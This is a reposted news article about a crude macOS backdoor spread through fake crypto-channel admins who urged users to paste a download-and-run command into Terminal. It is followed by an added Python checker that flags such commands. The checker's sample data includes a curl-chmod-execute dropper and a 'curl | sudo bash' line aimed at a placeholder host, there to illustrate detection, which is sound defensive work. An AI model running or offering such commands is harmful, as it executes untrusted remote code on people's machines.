Really dumb malware targets cryptocurrency fans using Macs

by Sean Gallagher, from Ars Technica - All content (#3T8KZ)
Image credit: Lucasfilm

Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.

Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote:

  • the infection method is dumb
  • the massive size of the binary is dumb
  • the persistence mechanism is lame (and thus also dumb)
  • the capabilities are rather limited (and thus rather dumb)
  • it's trivial to detect at every step (that dumb)
  • ... and finally, the malware saves the user's password to dumpdummy

The attack, first noted by Remco Verhoef of SANS today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:
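The article's own snippet is not reproduced above. As an added example (not the article's code), the following checker flags the download-then-execute pattern the paragraph describes when a pasted one-liner is reviewed before it is run; the sample commands and host names are constructed placeholders, not the campaign's real command.

```python
import re
import shlex

# Constructed sample commands for illustration only; the host names are placeholders
# and none of these is the command posted in the campaign the article describes.
SAMPLE_COMMANDS = {
    "dropper": "cd /tmp && curl -s http://placeholder.example/script -o script "
               "&& chmod +x script && ./script",
    "pipe_to_shell": "curl -fsSL https://placeholder.example/install.sh | sudo bash",
    "benign": "ls -la /tmp && cat /tmp/notes.txt",
}

FETCH_TOOLS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}

def split_command(command):
    """Split a one-liner on shell operators, yielding (operator_before, argv) pairs."""
    parts = re.split(r"\s*(&&|\|\||;|\|)\s*", command.strip())
    op = None
    for part in parts:
        if part in ("&&", "||", ";", "|"):
            op = part
            continue
        argv = shlex.split(part)
        if argv:
            yield op, argv

def risk_indicators(command):
    """Return the download-then-execute indicators found in a pasted command."""
    hits, downloaded, prev_fetch = [], set(), False
    for op, argv in split_command(command):
        if argv[0] == "sudo":
            hits.append("runs with sudo")
            argv = argv[1:] or ["sudo"]
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in FETCH_TOOLS:
            hits.append(f"downloads with {prog}")
            # Remember the output file so a later segment executing it can be tied back.
            for i, arg in enumerate(argv[1:-1], 1):
                if arg in ("-o", "-O", "--output"):
                    downloaded.add(argv[i + 1])
        elif prog == "chmod" and any(re.fullmatch(r"[ugoa]*\+[rws]*x[rws]*|[0-7]*[1357]", a)
                                     for a in argv[1:]):
            hits.append("marks a file executable")
        elif prog in INTERPRETERS and op == "|" and prev_fetch:
            hits.append(f"pipes download straight into {prog}")
        elif prog in downloaded or argv[0].startswith("./"):
            hits.append(f"executes {argv[0]}")
        prev_fetch = prog in FETCH_TOOLS
    return hits

def is_download_and_execute(command):
    """True when the command both fetches remote content and runs it (directly or via a pipe)."""
    hits = risk_indicators(command)
    return any(h.startswith("downloads") for h in hits) and \
        any(h.startswith(("executes", "pipes")) for h in hits)
```

Run against `SAMPLE_COMMANDS`, the dropper and pipe-to-shell samples are flagged and the benign listing is not; the chmod and sudo hits are reported but are not by themselves treated as a verdict.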

Source: Ars Technica - All content, https://arstechnica.com/ (feed: http://feeds.arstechnica.com/arstechnica/index)